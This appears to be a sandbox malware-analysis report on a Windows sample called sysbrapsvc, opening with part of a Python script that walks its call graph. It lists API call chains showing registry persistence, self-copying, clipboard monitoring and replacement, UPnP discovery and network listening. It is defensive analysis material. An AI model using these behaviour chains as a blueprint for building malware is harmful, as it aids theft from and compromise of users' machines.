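    queue = deque(nodes_calling(g, api))
    while queue:
        n = queue.popleft()
        if n in seen:
            continue
        seen.add(n)
        queue.extend(g.callers.get(n, ()))
    return sorted({g.nodes[n].addr for n in seen if g.nodes[n].addr})


if __name__ == "__main__":
    graph = parse_execution_graph(EXCERPT)
    print("nodes:", len(graph.nodes), "calls sendto:", nodes_calling(graph, "sendto"))
    print("functions on a path to sendto:", addresses_reaching(graph, "sendto"))
```

Feed the whole execution_graph text (everything after the "execution_graph" token, joined back into one string, since the page breaks it across lines mid-token) to `parse_execution_graph` and query for the APIs of interest; a node that appears only on the right-hand side of an edge, such as 4460 in EXCERPT, is kept without an address so the reverse walk can pass through it.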
                                                                                execution_graph 4375 407500 Sleep CreateMutexA GetLastError 4376 407536 ExitProcess 4375->4376 4377 40753e 6 API calls 4375->4377 4378 4075e3 4377->4378 4379 4078a9 Sleep RegOpenKeyExW 4377->4379 4545 40ebe0 GetLocaleInfoA strcmp 4378->4545 4380 407902 RegOpenKeyExW 4379->4380 4381 4078d6 RegSetValueExA RegCloseKey 4379->4381 4383 407924 RegSetValueExA RegCloseKey 4380->4383 4384 407955 RegOpenKeyExW 4380->4384 4381->4380 4386 4079fa RegOpenKeyExW 4383->4386 4387 407977 RegCreateKeyExW RegCloseKey 4384->4387 4388 4079ac RegOpenKeyExW 4384->4388 4392 407a1c RegSetValueExA RegCloseKey 4386->4392 4393 407a4d RegOpenKeyExW 4386->4393 4387->4388 4388->4386 4391 4079ce RegSetValueExA RegCloseKey 4388->4391 4389 4075f0 ExitProcess 4390 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4394 40764c SetFileAttributesW RegOpenKeyExW 4390->4394 4395 4076de Sleep wsprintfW CopyFileW 4390->4395 4391->4386 4398 407b49 RegOpenKeyExW 4392->4398 4399 407aa4 RegOpenKeyExW 4393->4399 4400 407a6f RegCreateKeyExW RegCloseKey 4393->4400 4394->4395 4401 40767d wcslen RegSetValueExW 4394->4401 4396 407726 SetFileAttributesW RegOpenKeyExW 4395->4396 4397 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4395->4397 4396->4397 4404 407757 wcslen RegSetValueExW 4396->4404 4397->4379 4405 407817 SetFileAttributesW RegOpenKeyExW 4397->4405 4402 407b97 RegOpenKeyExW 4398->4402 4403 407b6b RegSetValueExA RegCloseKey 4398->4403 4406 407ac6 RegCreateKeyExW RegCloseKey 4399->4406 4407 407afb RegOpenKeyExW 4399->4407 4400->4399 4401->4395 4408 4076b2 RegCloseKey 4401->4408 4409 407be5 RegOpenKeyExA 4402->4409 4410 407bb9 RegSetValueExA RegCloseKey 4402->4410 4403->4402 4404->4397 4411 40778c RegCloseKey 4404->4411 4405->4379 4412 407848 wcslen RegSetValueExW 4405->4412 4406->4407 4407->4398 4413 407b1d RegSetValueExA RegCloseKey 4407->4413 4547 40ee30 memset memset CreateProcessW 4408->4547 4415 407cf1 
RegOpenKeyExA 4409->4415 4416 407c0b 8 API calls 4409->4416 4410->4409 4417 40ee30 6 API calls 4411->4417 4412->4379 4418 40787d RegCloseKey 4412->4418 4413->4398 4421 407d17 8 API calls 4415->4421 4422 407dfd Sleep 4415->4422 4416->4415 4423 4077a5 4417->4423 4424 40ee30 6 API calls 4418->4424 4420 4076d6 ExitProcess 4421->4422 4456 40cc80 4422->4456 4423->4397 4425 4077b0 ExitProcess 4423->4425 4427 407896 4424->4427 4427->4379 4429 4078a1 ExitProcess 4427->4429 4430 407f87 4431 407e18 9 API calls 4459 405b60 InitializeCriticalSection CreateFileW 4431->4459 5750 405820 4431->5750 5759 406b50 Sleep GetModuleFileNameW 4431->5759 5774 4073b0 4431->5774 4437 407ecd CreateEventA 4491 40c3b0 4437->4491 4446 40d610 339 API calls 4447 407f2d 4446->4447 4448 40d610 339 API calls 4447->4448 4449 407f49 4448->4449 4450 40d610 339 API calls 4449->4450 4451 407f65 4450->4451 4536 40d780 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4451->4536 4453 407f75 4553 40d8c0 4453->4553 4562 40cc50 4456->4562 4460 405c85 4459->4460 4461 405b98 CreateFileMappingW 4459->4461 4473 40daf0 CoInitializeEx 4460->4473 4462 405bb9 MapViewOfFile 4461->4462 4463 405c7b CloseHandle 4461->4463 4464 405c71 CloseHandle 4462->4464 4465 405bd8 GetFileSize 4462->4465 4463->4460 4464->4463 4467 405bed 4465->4467 4466 405c67 UnmapViewOfFile 4466->4464 4467->4466 4469 405c2c 4467->4469 4472 405bfc 4467->4472 4691 40ccd0 4467->4691 4698 405c90 4467->4698 4470 40a660 _invalid_parameter 3 API calls 4469->4470 4470->4472 4472->4466 5008 40dbc0 socket 4473->5008 4475 407ec8 4486 406f70 CoInitializeEx SysAllocString 4475->4486 4476 40db98 5052 40a780 4476->5052 4479 40db5a 5033 40af30 htons 4479->5033 4480 40db10 4480->4475 4480->4476 4480->4479 5018 40de30 4480->5018 4485 40e920 24 API calls 4485->4476 4487 406f92 4486->4487 4488 406fa8 CoUninitialize 4486->4488 5197 406fc0 4487->5197 4488->4437 5206 40c370 4491->5206 4494 40c370 3 API calls 4495 40c3ce 4494->4495 4496 40c370 3 API calls 
4495->4496 4497 40c3de 4496->4497 4498 40c370 3 API calls 4497->4498 4499 407ee5 4498->4499 4500 40d5e0 4499->4500 4501 40a240 7 API calls 4500->4501 4502 40d5eb 4501->4502 4503 407eef 4502->4503 4504 40d5f7 InitializeCriticalSection 4502->4504 4505 40b770 InitializeCriticalSection 4503->4505 4504->4503 4520 40b78a 4505->4520 4506 40b7b9 CreateFileW 4508 40b7e0 CreateFileMappingW 4506->4508 4509 40b8a2 4506->4509 4510 40b801 MapViewOfFile 4508->4510 4511 40b898 CloseHandle 4508->4511 5261 40b010 EnterCriticalSection 4509->5261 4513 40b81c GetFileSize 4510->4513 4514 40b88e CloseHandle 4510->4514 4511->4509 4522 40b83b 4513->4522 4514->4511 4516 40b8a7 4517 40d610 339 API calls 4516->4517 4518 407ef9 4517->4518 4524 40d610 4518->4524 4519 40b884 UnmapViewOfFile 4519->4514 4520->4506 5213 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4520->5213 5214 40b350 4520->5214 4522->4519 4523 40b350 32 API calls 4522->4523 5264 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4522->5264 4523->4522 4525 40d627 EnterCriticalSection 4524->4525 4526 407f12 4524->4526 5289 40d700 4525->5289 4526->4446 4529 40d6eb LeaveCriticalSection 4529->4526 4530 40a490 9 API calls 4531 40d669 4530->4531 4531->4529 4532 40d67b CreateThread 4531->4532 4532->4529 4533 40d69e 4532->4533 5294 40b8d0 4532->5294 5300 401f50 GetQueuedCompletionStatus 4532->5300 5307 40d360 4532->5307 5313 40da00 4532->5313 5324 40daa0 4532->5324 5331 401920 GetTickCount WaitForSingleObject 4532->5331 5354 40d3b0 4532->5354 4534 40d6c2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4533->4534 4535 40d6e4 4533->4535 4534->4535 4535->4529 4537 40d7b6 InterlockedExchangeAdd 4536->4537 4538 40d899 GetCurrentThread SetThreadPriority 4536->4538 4537->4538 4543 40d7d0 4537->4543 4538->4453 4539 40d7e9 EnterCriticalSection 4539->4543 4540 40d857 LeaveCriticalSection 4542 40d86e 4540->4542 4540->4543 4541 40d833 WaitForSingleObject 4541->4543 4542->4538 4543->4538 4543->4539 4543->4540 4543->4541 4543->4542 4544 
40d88c Sleep 4543->4544 4544->4543 4546 4075e8 4545->4546 4546->4389 4546->4390 4548 40eea1 ShellExecuteW 4547->4548 4549 40ee92 Sleep 4547->4549 4551 40eed6 4548->4551 4552 40eec7 Sleep 4548->4552 4550 4076cb 4549->4550 4550->4395 4550->4420 4551->4550 4552->4550 4554 40d8cc EnterCriticalSection 4553->4554 4561 407f84 4553->4561 4555 40d8e8 4554->4555 4556 40d910 LeaveCriticalSection DeleteCriticalSection 4555->4556 4557 40d8fb CloseHandle 4555->4557 4558 40a660 _invalid_parameter 3 API calls 4556->4558 4557->4555 4559 40d936 4558->4559 4560 40a660 _invalid_parameter 3 API calls 4559->4560 4560->4561 4561->4430 4565 40c8a0 4562->4565 4566 40c8d3 4565->4566 4567 40c8be 4565->4567 4568 407e0d 4566->4568 4571 40ca80 4566->4571 4605 40c900 4567->4605 4568->4430 4568->4431 4572 40caa9 4571->4572 4573 40cb5a 4571->4573 4604 40cb52 4572->4604 4631 40a240 4572->4631 4575 40a240 7 API calls 4573->4575 4573->4604 4577 40cb7e 4575->4577 4580 402420 7 API calls 4577->4580 4577->4604 4582 40cba2 4580->4582 4581 40a240 7 API calls 4583 40caf2 4581->4583 4584 40a240 7 API calls 4582->4584 4639 4024e0 4583->4639 4586 40cbb1 4584->4586 4588 4024e0 10 API calls 4586->4588 4587 40cb1b 4642 40a660 4587->4642 4590 40cbda 4588->4590 4592 40a660 _invalid_parameter 3 API calls 4590->4592 4594 40cbe6 4592->4594 4593 402420 7 API calls 4595 40cb38 4593->4595 4596 402420 7 API calls 4594->4596 4597 4024e0 10 API calls 4595->4597 4598 40cbf7 4596->4598 4597->4604 4599 4024e0 10 API calls 4598->4599 4600 40cc11 4599->4600 4601 402420 7 API calls 4600->4601 4602 40cc22 4601->4602 4603 4024e0 10 API calls 4602->4603 4603->4604 4604->4568 4606 40c9b2 4605->4606 4607 40c929 4605->4607 4609 40a240 7 API calls 4606->4609 4630 40c9aa 4606->4630 4608 40a240 7 API calls 4607->4608 4607->4630 4610 40c93c 4608->4610 4611 40c9d8 4609->4611 4612 402420 7 API calls 4610->4612 4610->4630 4613 402420 7 API calls 4611->4613 4611->4630 4614 40c965 4612->4614 4615 40ca05 4613->4615 4616 4024e0 10 API calls 
4614->4616 4617 4024e0 10 API calls 4615->4617 4618 40c97f 4616->4618 4619 40ca1f 4617->4619 4620 402420 7 API calls 4618->4620 4621 402420 7 API calls 4619->4621 4622 40c990 4620->4622 4623 40ca30 4621->4623 4624 4024e0 10 API calls 4622->4624 4625 4024e0 10 API calls 4623->4625 4624->4630 4626 40ca4a 4625->4626 4627 402420 7 API calls 4626->4627 4628 40ca5b 4627->4628 4629 4024e0 10 API calls 4628->4629 4629->4630 4630->4568 4649 40a260 4631->4649 4634 402420 4670 40a450 4634->4670 4677 402540 4639->4677 4641 4024ff _invalid_parameter 4641->4587 4687 40a300 GetCurrentProcessId 4642->4687 4644 40a66b 4645 40a672 4644->4645 4688 40a5a0 4644->4688 4645->4593 4648 40a687 RtlFreeHeap 4648->4645 4658 40a300 GetCurrentProcessId 4649->4658 4651 40a26b 4652 40a277 _invalid_parameter 4651->4652 4659 40a320 4651->4659 4654 40a24e 4652->4654 4655 40a292 RtlAllocateHeap 4652->4655 4654->4604 4654->4634 4655->4654 4656 40a2b9 _invalid_parameter 4655->4656 4656->4654 4657 40a2d4 memset 4656->4657 4657->4654 4658->4651 4667 40a300 GetCurrentProcessId 4659->4667 4661 40a329 4662 40a346 HeapCreate 4661->4662 4668 40a390 GetProcessHeaps 4661->4668 4664 40a360 HeapSetInformation GetCurrentProcessId 4662->4664 4665 40a387 4662->4665 4664->4665 4665->4652 4667->4661 4669 40a33c 4668->4669 4669->4662 4669->4665 4671 40a260 _invalid_parameter 7 API calls 4670->4671 4672 40242b 4671->4672 4673 402820 4672->4673 4674 40282a 4673->4674 4675 40a450 _invalid_parameter 7 API calls 4674->4675 4676 402438 4675->4676 4676->4581 4678 40258e 4677->4678 4680 402551 4677->4680 4679 40a450 _invalid_parameter 7 API calls 4678->4679 4678->4680 4683 4025b2 _invalid_parameter 4679->4683 4680->4641 4681 4025e2 memcpy 4682 402606 _invalid_parameter 4681->4682 4684 40a660 _invalid_parameter 3 API calls 4682->4684 4683->4681 4685 40a660 _invalid_parameter 3 API calls 4683->4685 4684->4680 4686 4025df 4685->4686 4686->4681 4687->4644 4689 40a5d0 HeapValidate 4688->4689 4690 40a5f0 4688->4690 4689->4690 
4690->4645 4690->4648 4708 40a6d0 4691->4708 4694 40cd11 4694->4467 4697 40a660 _invalid_parameter 3 API calls 4697->4694 4921 40a490 4698->4921 4701 405cca memcpy 4702 40a6d0 8 API calls 4701->4702 4703 405d01 4702->4703 4931 40c640 4703->4931 4706 405d88 4706->4467 4709 40a6fd 4708->4709 4710 40a450 _invalid_parameter 7 API calls 4709->4710 4711 40a712 4709->4711 4712 40a714 memcpy 4709->4712 4710->4709 4711->4694 4713 40c1e0 4711->4713 4712->4709 4717 40c1ea 4713->4717 4715 40c209 4715->4694 4715->4697 4717->4715 4718 40c221 memcmp 4717->4718 4719 40c248 4717->4719 4721 40a660 _invalid_parameter 3 API calls 4717->4721 4722 40c6d0 4717->4722 4736 407fa0 4717->4736 4718->4717 4720 40a660 _invalid_parameter 3 API calls 4719->4720 4720->4715 4721->4717 4723 40c6df _invalid_parameter 4722->4723 4724 40a450 _invalid_parameter 7 API calls 4723->4724 4735 40c6e9 4723->4735 4725 40c778 4724->4725 4726 402420 7 API calls 4725->4726 4725->4735 4727 40c78d 4726->4727 4728 402420 7 API calls 4727->4728 4729 40c795 4728->4729 4731 40c7ed _invalid_parameter 4729->4731 4739 40c840 4729->4739 4744 402470 4731->4744 4734 402470 3 API calls 4734->4735 4735->4717 4852 40a1c0 4736->4852 4740 4024e0 10 API calls 4739->4740 4741 40c854 4740->4741 4750 4026f0 4741->4750 4743 40c86c 4743->4729 4745 4024ce 4744->4745 4747 402484 _invalid_parameter 4744->4747 4745->4734 4746 40a660 _invalid_parameter 3 API calls 4746->4745 4748 40a660 _invalid_parameter 3 API calls 4747->4748 4749 4024ac 4747->4749 4748->4749 4749->4746 4753 402710 4750->4753 4752 40270a 4752->4743 4754 402724 4753->4754 4755 402540 __aligned_recalloc_base 10 API calls 4754->4755 4756 40276d 4755->4756 4757 402540 __aligned_recalloc_base 10 API calls 4756->4757 4758 40277d 4757->4758 4759 402540 __aligned_recalloc_base 10 API calls 4758->4759 4760 40278d 4759->4760 4761 402540 __aligned_recalloc_base 10 API calls 4760->4761 4762 40279d 4761->4762 4763 4027a6 4762->4763 4764 4027cf 4762->4764 4768 403e20 4763->4768 4785 
403df0 4764->4785 4767 4027c7 _invalid_parameter 4767->4752 4769 402820 _invalid_parameter 7 API calls 4768->4769 4770 403e37 4769->4770 4771 402820 _invalid_parameter 7 API calls 4770->4771 4772 403e46 4771->4772 4773 402820 _invalid_parameter 7 API calls 4772->4773 4774 403e55 4773->4774 4775 402820 _invalid_parameter 7 API calls 4774->4775 4784 403e64 _invalid_parameter 4775->4784 4777 40400f _invalid_parameter 4778 402850 _invalid_parameter 3 API calls 4777->4778 4779 404035 _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter 3 API calls 4779->4780 4781 40405b _invalid_parameter 4779->4781 4780->4779 4782 402850 _invalid_parameter 3 API calls 4781->4782 4783 404081 4781->4783 4782->4781 4783->4767 4784->4777 4788 402850 4784->4788 4792 404090 4785->4792 4787 403e0c 4787->4767 4789 402866 4788->4789 4790 40285b 4788->4790 4789->4784 4791 40a660 _invalid_parameter 3 API calls 4790->4791 4791->4789 4793 4040a6 _invalid_parameter 4792->4793 4794 4040b8 _invalid_parameter 4793->4794 4795 4040dd 4793->4795 4797 404103 4793->4797 4794->4787 4822 403ca0 4795->4822 4798 40413d 4797->4798 4799 40415e 4797->4799 4832 404680 4798->4832 4801 402820 _invalid_parameter 7 API calls 4799->4801 4802 40416f 4801->4802 4803 402820 _invalid_parameter 7 API calls 4802->4803 4804 40417e 4803->4804 4805 402820 _invalid_parameter 7 API calls 4804->4805 4806 40418d 4805->4806 4807 402820 _invalid_parameter 7 API calls 4806->4807 4808 40419c 4807->4808 4845 403d70 4808->4845 4810 4041ca _invalid_parameter 4811 402820 _invalid_parameter 7 API calls 4810->4811 4813 404284 _invalid_parameter 4810->4813 4811->4810 4812 402850 _invalid_parameter 3 API calls 4812->4813 4813->4812 4814 4045a3 _invalid_parameter 4813->4814 4815 402850 _invalid_parameter 3 API calls 4814->4815 4816 4045c9 _invalid_parameter 4814->4816 4815->4814 4817 402850 _invalid_parameter 3 API calls 4816->4817 4818 4045ef _invalid_parameter 4816->4818 4817->4816 4819 402850 _invalid_parameter 3 API calls 
4818->4819 4820 404615 _invalid_parameter 4818->4820 4819->4818 4820->4794 4821 402850 _invalid_parameter 3 API calls 4820->4821 4821->4820 4823 403cae 4822->4823 4824 402820 _invalid_parameter 7 API calls 4823->4824 4825 403ccb 4824->4825 4826 402820 _invalid_parameter 7 API calls 4825->4826 4827 403cda _invalid_parameter 4826->4827 4828 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4827->4828 4829 403d3a _invalid_parameter 4827->4829 4828->4827 4830 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4829->4830 4831 403d60 4829->4831 4830->4829 4831->4794 4833 402820 _invalid_parameter 7 API calls 4832->4833 4834 404697 4833->4834 4835 402820 _invalid_parameter 7 API calls 4834->4835 4836 4046a6 4835->4836 4837 402820 _invalid_parameter 7 API calls 4836->4837 4838 4046b5 _invalid_parameter 4837->4838 4839 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4838->4839 4840 404841 _invalid_parameter 4838->4840 4839->4838 4841 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4840->4841 4842 404867 _invalid_parameter 4840->4842 4841->4840 4843 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4842->4843 4844 40488d 4842->4844 4843->4842 4844->4794 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403d7f _invalid_parameter 4846->4847 4848 403ca0 _invalid_parameter 9 API calls 4847->4848 4849 403db8 _invalid_parameter 4848->4849 4850 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4849->4850 4851 403de3 4849->4851 4850->4849 4851->4810 4853 40a1d2 4852->4853 4856 40a120 4853->4856 4857 40a450 _invalid_parameter 7 API calls 4856->4857 4864 40a130 4857->4864 4860 40a660 _invalid_parameter 3 API calls 4862 407fbf 4860->4862 4861 40a16c 4861->4860 4862->4717 4864->4861 4864->4862 4865 409650 4864->4865 4872 409c40 4864->4872 4877 40a010 4864->4877 4866 409663 4865->4866 4871 409659 4865->4871 4867 4096a6 memset 4866->4867 4866->4871 4868 
[Execution graph residue: the call-graph edge list ("node -> node" pairs with function addresses and API labels) from the rendered graph did not survive extraction as readable structure. Recoverable node labels from this span name Windows API calls grouped roughly as: WinINet/HTTP (InternetOpenA, InternetCrackUrlA, InternetConnectA, HttpOpenRequestA, HttpAddRequestHeadersA, HttpSendRequestA, HttpQueryInfoA, InternetOpenUrlA/W, InternetReadFile, InternetCloseHandle, DeleteUrlCacheEntry); Winsock (socket, WSASocketA, bind, listen, accept, connect, sendto, recvfrom, send, WSASend, WSARecv, WSAEventSelect, WSACreateEvent, WSAWaitForMultipleEvents, WSAEnumNetworkEvents, CreateIoCompletionPort, GetQueuedCompletionStatus, PostQueuedCompletionStatus, gethostname, gethostbyname, getpeername, getsockname, inet_addr, inet_ntoa, htons, ioctlsocket, setsockopt, shutdown, closesocket); file, drive and registry enumeration (CreateFileW, WriteFile, FlushFileBuffers, CreateFileMappingW, MapViewOfFile, GetFileSize, GetLogicalDrives, GetDriveTypeW, QueryDosDeviceW, GetVolumeInformationW, GetDiskFreeSpaceExW, FindFirstFileW, FindNextFileW, PathFileExistsW, PathMatchSpecW, SetFileAttributesW, CopyFileW, MoveFileExW, DeleteFileW, CreateDirectoryW, RemoveDirectoryW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey); clipboard and input (RegisterClassExW, CreateWindowExW, GetMessageA, DispatchMessageA, SetClipboardViewer, ChangeClipboardChain, IsClipboardFormatAvailable, OpenClipboard, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard, RegisterRawInputDevices); crypto (CryptAcquireContextW, CryptGenRandom, CryptReleaseContext); COM (CoInitialize, CoCreateInstance, SysAllocString, SysFreeString); and threading, timing and anti-analysis helpers (CreateThread, CreateEventA, WaitForSingleObject, Enter/LeaveCriticalSection, Interlocked* operations, NtQuerySystemTime, RtlTimeToSecondsSince1980, GetTickCount, Sleep, IsBadReadPtr, NtQueryVirtualMemory, RtlUnwind, ExitThread, ExitProcess).]
40536b StrStrW 5921->5926 5922 405303 StrStrW 5923 405316 5922->5923 5924 40531d StrStrW 5922->5924 5923->5924 5928 405330 5924->5928 5929 405337 StrStrW 5924->5929 5925->5926 5930 405385 StrStrW 5926->5930 5931 40537e 5926->5931 5927->5921 5927->5922 5928->5929 5929->5921 5932 40534a 5929->5932 5933 405398 5930->5933 5934 40539f StrStrW 5930->5934 5931->5930 5932->5921 5933->5934 5935 4053b2 5934->5935 5936 4053b9 StrStrW 5934->5936 5935->5936 5937 4053cc lstrlenA 5936->5937 5937->5913 5939 405492 GlobalAlloc 5937->5939 5939->5913 5940 4054ad GlobalLock 5939->5940 5940->5913 5941 4054c0 memcpy GlobalUnlock OpenClipboard 5940->5941 5941->5913 5942 4054ed EmptyClipboard SetClipboardData CloseClipboard 5941->5942 5942->5913 5944 40570b 5943->5944 5945 405711 lstrlenA 5944->5945 5946 4055d0 2 API calls 5944->5946 5947 405744 5944->5947 5945->5944 5946->5944 5947->5901 6050 40e5d1 6052 40e5da 6050->6052 6051 40e6cd 6052->6051 6053 40e643 lstrcmpiW 6052->6053 6054 40e6c3 SysFreeString 6053->6054 6055 40e656 6053->6055 6054->6051 6056 40e3c0 2 API calls 6055->6056 6058 40e664 6056->6058 6057 40e6b5 6057->6054 6058->6054 6058->6057 6059 40e693 lstrcmpiW 6058->6059 6060 40e6a5 6059->6060 6061 40e6ab SysFreeString 6059->6061 6060->6061 6061->6057 6116 4074f1 ExitThread 6062 40f354 6063 40f372 6062->6063 6064 40f408 6062->6064 6065 40f589 NtQueryVirtualMemory 6063->6065 6067 40f38d 6065->6067 6066 40f474 RtlUnwind 6066->6067 6067->6064 6067->6066 6129 407ff9 6130 408002 6129->6130 6131 408011 34 API calls 6130->6131 6132 408e46 6130->6132 6068 405f1d 6069 405eb1 6068->6069 6070 405f1b 6069->6070 6074 405f06 memcpy 6069->6074 6071 40a660 _invalid_parameter 3 API calls 6070->6071 6072 405f28 LeaveCriticalSection 6071->6072 6074->6070 6133 40a73e 6134 40a660 _invalid_parameter 3 API calls 6133->6134 6137 40a6fd 6134->6137 6135 40a712 6136 40a450 _invalid_parameter 7 API calls 6136->6137 6137->6135 6137->6136 6138 40a714 memcpy 6137->6138 6138->6137

                                                                                Control-flow Graph
                                                                                APIs
                                                                                • GetSystemInfo.KERNELBASE(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
                                                                                • htons.WS2_32(?), ref: 00402101
                                                                                • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D610: CreateThread.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1603358586-0
                                                                                • Opcode ID: 4db169d13743859b8383a90071416f4958d16977be98986f5eea89773197346b
                                                                                • Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
                                                                                • Opcode Fuzzy Hash: 4db169d13743859b8383a90071416f4958d16977be98986f5eea89773197346b
                                                                                • Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A

                                                                                Control-flow Graph
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                • htons.WS2_32(0000076C), ref: 0040DC10
                                                                                • inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                • bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                • lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                • sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                  • Part of subcall function 0040DD40: Sleep.KERNELBASE(000003E8), ref: 0040DD9E
                                                                                  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                • String ID: 239.255.255.250
                                                                                • API String ID: 726339449-2186272203
                                                                                • Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
                                                                                • Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                • htons.WS2_32(?), ref: 00401508
                                                                                • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401569
                                                                                Memory Dump Source
